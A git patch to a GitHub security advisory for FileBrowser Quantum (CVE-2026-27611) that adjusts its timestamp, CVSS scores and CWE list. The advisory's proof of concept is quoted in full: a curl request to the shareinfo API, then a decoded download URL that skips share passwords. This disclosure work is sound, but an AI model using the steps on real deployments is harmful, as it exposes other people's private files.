From 4ceca2abfcebad55f8aba426e50172335b808140 Mon Sep 17 00:00:00 2001
From: Byte <113946747+ByteAfterlife@users.noreply.github.com>
Date: Thu, 9 Apr 2026 13:21:43 -0500
Subject: [PATCH] Improve GHSA-8vrh-3pm2-v4v6
---
 .../2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json | 9 +++------
 1 file changed, 3 insertions(+), 6 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json b/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json
index 635dca48b9a24..67faed97afb78 100644
--- a/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8vrh-3pm2-v4v6",
- "modified": "2026-02-27T21:42:54Z",
+ "modified": "2026-02-27T21:42:55Z",
 "published": "2026-02-25T16:00:49Z",
 "aliases": [
 "CVE-2026-27611" 
@@ -9,10 +9,6 @@
 "summary": "FileBrowser Quantum: Password Protection Not Enforced on Shared File Links ",
 "details": "### Summary\nWhen users share password-protected files, the recipient can completely bypass the password and still download the file.\n\n### Details\nThis happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.\n\n### PoC\n1. As an authenticated user, create a share for a file, with a password specified in \"Optional password\" (make sure to allow anonymous access as the PoC doesn't explain how to do this on a share that requires login, but it is also possible to do on a share that requires login, with some small tweaks to the API request)\n2. Copy the first link (the clipboard WITHOUT an arrow) because the second one just completely skips the password without any effort required, which was mentioned in another vulnerability (https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3v48-283x-f2w4)\n\nNow, the link that was copied should look like:\nhttps://yourdomain/public/share/yoursharehash\nexample:\nhttps://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA\n\nNow, make a API request with any api client to GET \nhttps://yourdomain/public/api/shareinfo?hash=(the share hash from the link)\nexample:\nhttps://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA\n\nIf curl is preferred, a (command line based API client), here's the command:\n`curl 'https://yourdomain/public/api/shareinfo?hash=yoursharehash' -H 'Accept: */*'`\nexample:\n`curl 'https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA' -H 'Accept: */*'`\n\nExample response:\n```\n{\n \"shareTheme\": \"default\",\n \"title\": \"Shared files - IMG_20240814_213703451.jpg\",\n \"description\": \"A share has been sent to you to view or download.\",\n \"disableSidebar\": false,\n \"source\": \"/folder\",\n \"path\": \"/IMG_20240814_213703451.jpg/\",\n 
\"downloadURL\": \"https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\",\n \"shareURL\": \"https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA\",\n \"enforceDarkLightMode\": \"default\",\n \"viewMode\": \"normal\",\n \"shareType\": \"normal\",\n \"sidebarLinks\": [\n {\n \"name\": \"Share QR Code and Info\",\n \"category\": \"shareInfo\",\n \"target\": \"#\",\n \"icon\": \"qr_code\"\n },\n {\n \"name\": \"Download\",\n \"category\": \"download\",\n \"target\": \"#\",\n \"icon\": \"download\"\n }\n ],\n \"hasPassword\": true\n}\n```\n\nLook at the downloadURL. It encodes the \"&\" symbol as \"\\u0026\" so just replace \"\\u0026\" with \"&\", example: \nhttps://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\nshould be changed to:\nhttps://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\n\nThen just copy paste the new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser, and the file will download. All without giving a password.\n\n### Impact\nThis affects anyone who shares password-protected files.", "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" - }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" @@ -68,7 +64,8 @@ "database_specific": { "cwe_ids": [ "CWE-200", - "CWE-288" + "CWE-288", + "CWE-602" ], "severity": "HIGH", "github_reviewed": true,